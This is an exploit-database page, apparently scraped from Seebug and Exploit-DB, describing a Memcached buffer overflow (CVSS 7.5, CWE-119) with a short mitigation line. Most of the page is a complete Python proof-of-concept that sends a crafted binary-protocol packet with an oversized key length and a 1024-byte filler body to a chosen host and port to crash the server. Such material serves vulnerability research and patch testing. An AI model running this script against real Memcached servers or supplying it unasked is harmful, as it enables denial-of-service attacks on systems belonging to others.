Memcached Buffer Overflow Vulnerability

vendor:

Memcached

by:

Seebug

7,5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Memcached

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux, Windows, Mac

2018

Memcached Buffer Overflow Vulnerability

This exploit is a proof-of-concept code for a buffer overflow vulnerability in Memcached. The vulnerability is triggered when a maliciously crafted packet is sent to the server, which causes the server to crash. The packet contains a key length of 0xfa, an extra length of 0x00, a data type of 0x00, a vbucket of 0x0000, a body length of 0, an opaque of 0, a CAS of 0, and a body of 1024 bytes of 'A's. The exploit is written in Python and uses the socket library to send the malicious packet to the server.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to the latest version of Memcached.

Source

Exploit-DB raw data:

# Source: http://paper.seebug.org/95/

import struct  
import socket  
import sys

MEMCACHED_REQUEST_MAGIC = "\x80"  
OPCODE_PREPEND_Q = "\x1a"  
key_len = struct.pack("!H",0xfa)  
extra_len = "\x00"  
data_type = "\x00"  
vbucket = "\x00\x00"  
body_len = struct.pack("!I",0)  
opaque = struct.pack("!I",0)  
CAS = struct.pack("!Q",0)  
body = "A"*1024

if len(sys.argv) != 3:  
        print "./poc_crash.py <server> <port>"

packet = MEMCACHED_REQUEST_MAGIC + OPCODE_PREPEND_Q + key_len + extra_len  
packet += data_type + vbucket + body_len + opaque + CAS  
packet += body

set_packet = "set testkey 0 60 4\r\ntest\r\n"  
get_packet = "get testkey\r\n"

s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s1.connect((sys.argv[1],int(sys.argv[2])))  
s1.sendall(set_packet)  
print s1.recv(1024)  
s1.close()


s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s2.connect((sys.argv[1],int(sys.argv[2])))  
s2.sendall(packet)  
print s2.recv(1024)  
s2.close()

s3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s3.connect((sys.argv[1],int(sys.argv[2])))  
s3.sendall(get_packet)  
s3.recv(1024)  
s3.close()